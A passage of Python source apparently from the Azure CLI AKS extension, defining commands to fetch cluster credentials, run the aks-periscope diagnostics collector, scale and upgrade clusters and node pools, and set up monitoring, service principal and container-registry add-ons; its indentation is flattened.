credentialResults = client.list_cluster_user_credentials(resource_group_name, name)
elif user.lower() == 'clustermonitoringuser':
credentialResults = client.list_cluster_monitoring_user_credentials(resource_group_name, name)
else:
raise CLIError("The user is invalid.")
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(encoding='UTF-8')
_print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
ADDONS = {
'http_application_routing': 'httpApplicationRouting',
'monitoring': 'omsagent',
'virtual-node': 'aciConnector',
'azure-policy': 'azurepolicy',
'kube-dashboard': 'kubeDashboard',
'ingress-appgw': CONST_INGRESS_APPGW_ADDON_NAME
}
# pylint: disable=line-too-long
def aks_kollect(cmd, # pylint: disable=too-many-statements,too-many-locals
client,
resource_group_name,
name,
storage_account=None,
sas_token=None,
container_logs=None,
kube_objects=None,
node_logs=None):
colorama.init()
mc = client.get(resource_group_name, name)
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
storage_account_id = None
if storage_account is None:
print("No storage account specified. Try getting storage account from diagnostic settings")
storage_account_id = get_storage_account_from_diag_settings(cmd.cli_ctx, resource_group_name, name)
if storage_account_id is None:
raise CLIError("A storage account must be specified, since there isn't one in the diagnostic settings.")
from msrestazure.tools import is_valid_resource_id, parse_resource_id, resource_id
if storage_account_id is None:
if not is_valid_resource_id(storage_account):
storage_account_id = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Storage', type='storageAccounts',
name=storage_account
)
else:
storage_account_id = storage_account
if is_valid_resource_id(storage_account_id):
try:
parsed_storage_account = parse_resource_id(storage_account_id)
except CloudError as ex:
raise CLIError(ex.message)
else:
raise CLIError("Invalid storage account id %s" % storage_account_id)
storage_account_name = parsed_storage_account['name']
readonly_sas_token = None
if sas_token is None:
storage_client = cf_storage(cmd.cli_ctx, parsed_storage_account['subscription'])
storage_account_keys = storage_client.storage_accounts.list_keys(parsed_storage_account['resource_group'],
storage_account_name)
kwargs = {
'account_name': storage_account_name,
'account_key': storage_account_keys.keys[0].value
}
cloud_storage_client = cloud_storage_account_service_factory(cmd.cli_ctx, kwargs)
sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rwdlacup',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rl',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = readonly_sas_token.strip('?')
from knack.prompting import prompt_y_n
print()
print('This will deploy a daemon set to your cluster to collect logs and diagnostic information and '
f'save them to the storage account '
f'{colorama.Style.BRIGHT}{colorama.Fore.GREEN}{storage_account_name}{colorama.Style.RESET_ALL} as '
f'outlined in {format_hyperlink("http://aka.ms/AKSPeriscope")}.')
print()
print('If you share access to that storage account to Azure support, you consent to the terms outlined'
f' in {format_hyperlink("http://aka.ms/DiagConsent")}.')
print()
if not prompt_y_n('Do you confirm?', default="n"):
return
print()
print("Getting credentials for cluster %s " % name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=True, path=temp_kubeconfig_path)
print()
print("Starts collecting diag info for cluster %s " % name)
sas_token = sas_token.strip('?')
deployment_yaml = urlopen(
"https://raw.githubusercontent.com/Azure/aks-periscope/v0.2/deployment/aks-periscope.yaml").read().decode()
deployment_yaml = deployment_yaml.replace("# <accountName, base64 encoded>",
(base64.b64encode(bytes(storage_account_name, 'ascii'))).decode('ascii'))
deployment_yaml = deployment_yaml.replace("# <saskey, base64 encoded>",
(base64.b64encode(bytes("?" + sas_token, 'ascii'))).decode('ascii'))
yaml_lines = deployment_yaml.splitlines()
for index, line in enumerate(yaml_lines):
if "DIAGNOSTIC_CONTAINERLOGS_LIST" in line and container_logs is not None:
yaml_lines[index] = line + ' ' + container_logs
if "DIAGNOSTIC_KUBEOBJECTS_LIST" in line and kube_objects is not None:
yaml_lines[index] = line + ' ' + kube_objects
if "DIAGNOSTIC_NODELOGS_LIST" in line and node_logs is not None:
yaml_lines[index] = line + ' ' + node_logs
deployment_yaml = '\n'.join(yaml_lines)
fd, temp_yaml_path = tempfile.mkstemp()
temp_yaml_file = os.fdopen(fd, 'w+t')
try:
temp_yaml_file.write(deployment_yaml)
temp_yaml_file.flush()
temp_yaml_file.close()
try:
print()
print("Cleaning up aks-periscope resources if existing")
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"serviceaccount,configmap,daemonset,secret",
"--all", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding-view", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRole",
"aks-periscope-role", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"--all",
"apd", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.DEVNULL)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"CustomResourceDefinition",
"diagnostics.aks-periscope.azure.github.com", "--ignore-not-found"],
stderr=subprocess.STDOUT)
print()
print("Deploying aks-periscope")
subprocess.check_output(["kubectl", "--kubeconfig", temp_kubeconfig_path, "apply", "-f",
temp_yaml_path, "-n", "aks-periscope"], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
finally:
os.remove(temp_yaml_path)
print()
normalized_fqdn = mc.fqdn.replace('.', '-')
token_in_storage_account_url = readonly_sas_token if readonly_sas_token is not None else sas_token
log_storage_account_url = f"https://{storage_account_name}.blob.core.windows.net/" \
f"{normalized_fqdn}?{token_in_storage_account_url}"
print(f'{colorama.Fore.GREEN}Your logs are being uploaded to storage account {format_bright(storage_account_name)}')
print()
print(f'You can download Azure Stroage Explorer here '
f'{format_hyperlink("https://azure.microsoft.com/en-us/features/storage-explorer/")}'
f' to check the logs by adding the storage account using the following URL:')
print(f'{format_hyperlink(log_storage_account_url)}')
print()
if not prompt_y_n('Do you want to see analysis results now?', default="n"):
print(f"You can run 'az aks kanalyze -g {resource_group_name} -n {name}' "
f"anytime to check the analysis results.")
else:
display_diagnostics_report(temp_kubeconfig_path)
return
def aks_kanalyze(cmd, client, resource_group_name, name):
colorama.init()
client.get(resource_group_name, name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=True, path=temp_kubeconfig_path)
display_diagnostics_report(temp_kubeconfig_path)
def aks_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
node_count,
nodepool_name="",
no_wait=False):
instance = client.get(resource_group_name, name)
if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
raise CLIError('There are more than one node pool in the cluster. '
'Please specify nodepool name or use az aks nodepool command to scale node pool')
if node_count == 0:
raise CLIError("Can't scale down to 0 nodes.")
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
def aks_upgrade(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
kubernetes_version,
control_plane_only=False,
no_wait=False,
**kwargs): # pylint: disable=unused-argument
instance = client.get(resource_group_name, name)
if instance.kubernetes_version == kubernetes_version:
if instance.provisioning_state == "Succeeded":
logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
"will occur when upgrading to the same version if the cluster is not in a failed state.",
instance.kubernetes_version)
elif instance.provisioning_state == "Failed":
logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
"attempt resolution of failed cluster state.", instance.kubernetes_version)
from knack.prompting import prompt_y_n
upgrade_all = False
instance.kubernetes_version = kubernetes_version
vmas_cluster = False
for agent_profile in instance.agent_pool_profiles:
if agent_profile.type.lower() == "availabilityset":
vmas_cluster = True
break
# for legacy clusters, we always upgrade node pools with CCP.
if instance.max_agent_pools < 8 or vmas_cluster:
if control_plane_only:
msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
"upgraded to {} as well. Continue?").format(instance.kubernetes_version)
if not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
if not control_plane_only:
msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
"AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
if not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
"Node pool will not change. Continue?").format(instance.kubernetes_version)
if not prompt_y_n(msg, default="n"):
return None
if upgrade_all:
for agent_profile in instance.agent_pool_profiles:
agent_profile.orchestrator_version = kubernetes_version
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def _handle_addons_args(cmd, addons_str, subscription_id, resource_group_name, addon_profiles=None,
workspace_resource_id=None, appgw_name=None, appgw_subnet_prefix=None, appgw_id=None, appgw_subnet_id=None, appgw_shared=False, appgw_watch_namespace=None):
if not addon_profiles:
addon_profiles = {}
addons = addons_str.split(',') if addons_str else []
if 'http_application_routing' in addons:
addon_profiles['httpApplicationRouting'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('http_application_routing')
if 'kube-dashboard' in addons:
addon_profiles['kubeDashboard'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('kube-dashboard')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons:
if not workspace_resource_id:
# use default workspace if exists else create default workspace
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profiles['omsagent'] = ManagedClusterAddonProfile(
enabled=True, config={'logAnalyticsWorkspaceResourceID': workspace_resource_id})
addons.remove('monitoring')
# error out if '--enable-addons=monitoring' isn't set but workspace_resource_id is
elif workspace_resource_id:
raise CLIError('"--workspace-resource-id" requires "--enable-addons monitoring".')
if 'azure-policy' in addons:
addon_profiles['azurepolicy'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('azure-policy')
if 'ingress-appgw' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_prefix is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_PREFIX] = appgw_subnet_prefix
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_shared:
addon_profile.config[CONST_INGRESS_APPGW_SHARED] = "true"
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME] = addon_profile
addons.remove('ingress-appgw')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name):
# mapping for azure public cloud
# log analytics workspaces cannot be created in WCUS region due to capacity limits
# so mapped to EUS per discussion with log analytics team
AzureCloudLocationToOmsRegionCodeMap = {
"australiasoutheast": "ASE",
"australiaeast": "EAU",
"australiacentral": "CAU",
"canadacentral": "CCA",
"centralindia": "CIN",
"centralus": "CUS",
"eastasia": "EA",
"eastus": "EUS",
"eastus2": "EUS2",
"eastus2euap": "EAP",
"francecentral": "PAR",
"japaneast": "EJP",
"koreacentral": "SE",
"northeurope": "NEU",
"southcentralus": "SCUS",
"southeastasia": "SEA",
"uksouth": "SUK",
"usgovvirginia": "USGV",
"westcentralus": "EUS",
"westeurope": "WEU",
"westus": "WUS",
"westus2": "WUS2"
}
AzureCloudRegionToOmsRegionMap = {
"australiacentral": "australiacentral",
"australiacentral2": "australiacentral",
"australiaeast": "australiaeast",
"australiasoutheast": "australiasoutheast",
"brazilsouth": "southcentralus",
"canadacentral": "canadacentral",
"canadaeast": "canadacentral",
"centralus": "centralus",
"centralindia": "centralindia",
"eastasia": "eastasia",
"eastus": "eastus",
"eastus2": "eastus2",
"francecentral": "francecentral",
"francesouth": "francecentral",
"japaneast": "japaneast",
"japanwest": "japaneast",
"koreacentral": "koreacentral",
"koreasouth": "koreacentral",
"northcentralus": "eastus",
"northeurope": "northeurope",
"southafricanorth": "westeurope",
"southafricawest": "westeurope",
"southcentralus": "southcentralus",
"southeastasia": "southeastasia",
"southindia": "centralindia",
"uksouth": "uksouth",
"ukwest": "uksouth",
"westcentralus": "eastus",
"westeurope": "westeurope",
"westindia": "centralindia",
"westus": "westus",
"westus2": "westus2"
}
# mapping for azure china cloud
# log analytics only support China East2 region
AzureChinaLocationToOmsRegionCodeMap = {
"chinaeast": "EAST2",
"chinaeast2": "EAST2",
"chinanorth": "EAST2",
"chinanorth2": "EAST2"
}
AzureChinaRegionToOmsRegionMap = {
"chinaeast": "chinaeast2",
"chinaeast2": "chinaeast2",
"chinanorth": "chinaeast2",
"chinanorth2": "chinaeast2"
}
# mapping for azure us governmner cloud
AzureFairfaxLocationToOmsRegionCodeMap = {
"usgovvirginia": "USGV"
}
AzureFairfaxRegionToOmsRegionMap = {
"usgovvirginia": "usgovvirginia"
}
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
cloud_name = cmd.cli_ctx.cloud.name
if cloud_name.lower() == 'azurecloud':
workspace_region = AzureCloudRegionToOmsRegionMap.get(rg_location, "eastus")
workspace_region_code = AzureCloudLocationToOmsRegionCodeMap.get(workspace_region, "EUS")
elif cloud_name.lower() == 'azurechinacloud':
workspace_region = AzureChinaRegionToOmsRegionMap.get(rg_location, "chinaeast2")
workspace_region_code = AzureChinaLocationToOmsRegionCodeMap.get(workspace_region, "EAST2")
elif cloud_name.lower() == 'azureusgovernment':
workspace_region = AzureFairfaxRegionToOmsRegionMap.get(rg_location, "usgovvirginia")
workspace_region_code = AzureFairfaxLocationToOmsRegionCodeMap.get(workspace_region, "USGV")
else:
logger.error("AKS Monitoring addon not supported in cloud : %s", cloud_name)
default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code
default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(subscription_id, workspace_region_code)
default_workspace_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \
'/workspaces/{2}'.format(subscription_id, default_workspace_resource_group, default_workspace_name)
resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id)
resources = cf_resources(cmd.cli_ctx, subscription_id)
# check if default RG exists
if resource_groups.check_existence(default_workspace_resource_group):
try:
resource = resources.get_by_id(default_workspace_resource_id, '2015-11-01-preview')
return resource.id
except CloudError as ex:
if ex.status_code != 404:
raise ex
else:
resource_groups.create_or_update(default_workspace_resource_group, {'location': workspace_region})
default_workspace_params = {
'location': workspace_region,
'properties': {
'sku': {
'name': 'standalone'
}
}
}
async_poller = resources.create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview',
default_workspace_params)
ws_resource_id = ''
while True:
result = async_poller.result(15)
if async_poller.done():
ws_resource_id = result.id
break
return ws_resource_id
def _ensure_container_insights_for_monitoring(cmd, addon):
if not addon.enabled:
return None
# workaround for this addon key which has been seen lowercased in the wild
if 'loganalyticsworkspaceresourceid' in addon.config:
addon.config['logAnalyticsWorkspaceResourceID'] = addon.config.pop('loganalyticsworkspaceresourceid')
workspace_resource_id = addon.config['logAnalyticsWorkspaceResourceID'].strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
# extract subscription ID and resource group from workspace_resource_id URL
try:
subscription_id = workspace_resource_id.split('/')[2]
resource_group = workspace_resource_id.split('/')[4]
except IndexError:
raise CLIError('Could not locate resource group in workspace-resource-id URL.')
# region of workspace can be different from region of RG so find the location of the workspace_resource_id
resources = cf_resources(cmd.cli_ctx, subscription_id)
try:
resource = resources.get_by_id(workspace_resource_id, '2015-11-01-preview')
location = resource.location
except CloudError as ex:
raise ex
unix_time_in_millis = int(
(datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0)
solution_deployment_name = 'ContainerInsights-{}'.format(unix_time_in_millis)
# pylint: disable=line-too-long
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"workspaceResourceId": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics Resource ID"
}
},
"workspaceRegion": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics workspace region"
}
},
"solutionDeploymentName": {
"type": "string",
"metadata": {
"description": "Name of the solution deployment"
}
}
},
"resources": [
{
"type": "Microsoft.Resources/deployments",
"name": "[parameters('solutionDeploymentName')]",
"apiVersion": "2017-05-10",
"subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]",
"resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]",
"properties": {
"mode": "Incremental",
"template": {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {},
"variables": {},
"resources": [
{
"apiVersion": "2015-11-01-preview",
"type": "Microsoft.OperationsManagement/solutions",
"location": "[parameters('workspaceRegion')]",
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"properties": {
"workspaceResourceId": "[parameters('workspaceResourceId')]"
},
"plan": {
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"product": "[Concat('OMSGallery/', 'ContainerInsights')]",
"promotionCode": "",
"publisher": "Microsoft"
}
}
]
},
"parameters": {}
}
}
]
}
params = {
"workspaceResourceId": {
"value": workspace_resource_id
},
"workspaceRegion": {
"value": location
},
"solutionDeploymentName": {
"value": solution_deployment_name
}
}
deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis)
# publish the Container Insights solution to the Log Analytics workspace
return _invoke_deployment(cmd.cli_ctx, resource_group, deployment_name, template, params,
validate=False, no_wait=False, subscription_id=subscription_id)
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
file_name_aks = 'aksServicePrincipal.json'
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, try to load it from local disk
principal_obj = load_acs_service_principal(subscription_id, file_name=file_name_aks)
if principal_obj:
service_principal = principal_obj.get('service_principal')
client_secret = principal_obj.get('client_secret')
else:
# Nothing to load, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'http://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location)
service_principal = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
# --service-principal specfied, validate --client-secret was too
if not client_secret:
raise CLIError('--client-secret is required if --service-principal is specified')
store_acs_service_principal(subscription_id, client_secret, service_principal, file_name=file_name_aks)
return load_acs_service_principal(subscription_id, file_name=file_name_aks)
def _get_rg_location(ctx, resource_group_name, subscription_id=None):
groups = cf_resource_groups(ctx, subscription_id=subscription_id)
# Just do the get, we don't need the result, it will error out if the group doesn't exist.
rg = groups.get(resource_group_name)
return rg.location
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
raise CLIError('Please specifying both min-count and max-count when --enable-cluster-autoscaler enabled')
if int(min_count) > int(max_count):
raise CLIError('value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError('node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
if min_count is not None or max_count is not None:
raise CLIError('min-count and max-count are required for --enable-cluster-autoscaler, please use the flag')
def _create_client_secret():
# Add a special character to satsify AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(os.urandom(10)).decode('utf-8') + special_char
return client_secret
def _ensure_aks_acr(cli_ctx,
client_id,
acr_name_or_id,
subscription_id, # pylint: disable=unused-argument
detach=False):
from msrestazure.tools import is_valid_resource_id, parse_resource_id
# Check if the ACR exists by resource ID.
if is_valid_resource_id(acr_name_or_id):
try:
parsed_registry = parse_resource_id(acr_name_or_id)
acr_client = cf_container_registry_service(cli_ctx, subscription_id=parsed_registry['subscription'])
registry = acr_client.registries.get(parsed_registry['resource_group'], parsed_registry['name'])
except CloudError as ex:
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
# Check if the ACR exists by name accross all resource groups.
registry_name = acr_name_or_id
registry_resource = 'Microsoft.ContainerRegistry/registries'
try:
registry = get_resource_by_name(cli_ctx, registry_name, registry_resource)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError("ACR {} not found. Have you provided the right ACR name?".format(registry_name))
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
def _ensure_aks_acr_role_assignment(cli_ctx,
client_id,
registry_id,
detach=False):
if detach:
if not _delete_role_assignments(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not delete role assignments for ACR. '
'Are you an Owner on this subscription?')
return
if not _add_role_assignment(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not create a role assignment for ACR. '
'Are you an Owner on this subscription?')
return
def aks_agentpool_show(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
return instance
def aks_agentpool_list(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name):
return client.list(resource_group_name, cluster_name)
def aks_agentpool_add(cmd, # pylint: disable=unused-argument,too-many-locals
client,
resource_group_name,
cluster_name,
nodepool_name,
tags=None,
kubernetes_version=None,
node_zones=None,
node_vm_size=None,
node_osdisk_size=0,
node_count=3,
vnet_subnet_id=None,
max_pods=0,
os_type="Linux",
min_count=None,
max_count=None,
enable_cluster_autoscaler=False,
node_taints=None,
priority=CONST_SCALE_SET_PRIORITY_REGULAR,
eviction_policy=CONST_SPOT_EVICTION_POLICY_DELETE,
spot_max_price=float('nan'),
public_ip_per_vm=False,
labels=None,
no_wait=False):
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name == nodepool_name:
raise CLIError("Node pool {} already exists, please try a different name, "
"use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
taints_array = []
if node_taints is not None:
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise CLIError('Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
if node_vm_size is None:
if os_type == "Windows":
node_vm_size = "Standard_D2s_v3"
else:
node_vm_size = "Standard_DS2_v2"
agent_pool = AgentPool(
name=nodepool_name,
tags=tags,
node_labels=labels,
count=int(node_count),
vm_size=node_vm_size,
os_type=os_type,
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
agent_pool_type="VirtualMachineScaleSets",
max_pods=int(max_pods) if max_pods else None,
orchestrator_version=kubernetes_version,
availability_zones=node_zones,
node_taints=taints_array,
scale_set_priority=priority,
enable_node_public_ip=public_ip_per_vm
)
if priority == CONST_SCALE_SET_PRIORITY_SPOT:
agent_pool.scale_set_eviction_policy = eviction_policy
if isnan(spot_max_price):
spot_max_price = -1
agent_pool.spot_max_price = spot_max_price
_check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
if node_osdisk_size:
agent_pool.os_disk_size_gb = int(node_osdisk_size)
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, agent_pool)
def aks_agentpool_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
node_count=3,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
new_node_count = int(node_count)
if new_node_count == 0:
raise CLIError("Can't scale down to 0 nodes.")
if new_node_count == instance.count:
raise CLIError("The new node count is the same as the current node count.")
instance.count = new_node_count # pylint: disable=no-member
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_upgrade(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
kubernetes_version,
nodepool_name,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
instance.orchestrator_version = kubernetes_version
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_update(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
tags=None,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
min_count=None, max_count=None,
no_wait=False):
update_flags = enable_cluster_autoscaler + disable_cluster_autoscaler + update_cluster_autoscaler
if update_flags != 1:
if update_flags != 0 or tags is None:
raise CLIError('Please specify "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler"')
instance = client.get(resource_group_name, cluster_name, nodepool_name)
node_count = instance.count
if min_count is None or max_count is None:
if enable_cluster_autoscaler or update_cluster_autoscaler:
raise CLIError('Please specifying both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError('value of min-count should be less than or equal to value of max-count.')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError("current node count '{}' is not in the range of min-count and max-count.".format(node_count))
if enable_cluster_autoscaler:
if instance.enable_auto_scaling:
logger.warning('Autoscaler is already enabled for this node pool.\n'
'Please run "az aks nodepool update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.min_count = int(min_count)
instance.max_count = int(max_count)
instance.enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.enable_auto_scaling:
raise CLIError('Autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.min_count = int(min_count)
instance.max_count = int(max_count)
if disable_cluster_autoscaler:
if not instance.enable_auto_scaling:
logger.warning('Autoscaler is already disabled for this node pool.')
return None
instance.enable_auto_scaling = False
instance.min_count = None
instance.max_count = None
instance.tags = tags
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_delete(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise CLIError("Node pool {} doesnt exist, "
"use 'aks nodepool list' to get current node pool list".format(nodepool_name))
return sdk_no_wait(no_wait, client.delete, resource_group_name, cluster_name, nodepool_name)
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None,
subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_id=None, appgw_subnet_id=None, appgw_shared=False, appgw_watch_namespace=None, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
service_principal_client_id = instance.service_principal_profile.client_id
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable=True,
workspace_resource_id=workspace_resource_id, subnet_name=subnet_name,
appgw_name=appgw_name, appgw_subnet_prefix=appgw_subnet_prefix, appgw_id=appgw_id, appgw_subnet_id=appgw_subnet_id, appgw_shared=appgw_shared, appgw_watch_namespace=appgw_watch_namespace, no_wait=no_wait)
if 'omsagent' in instance.addon_profiles and instance.addon_profiles['omsagent'].enabled:
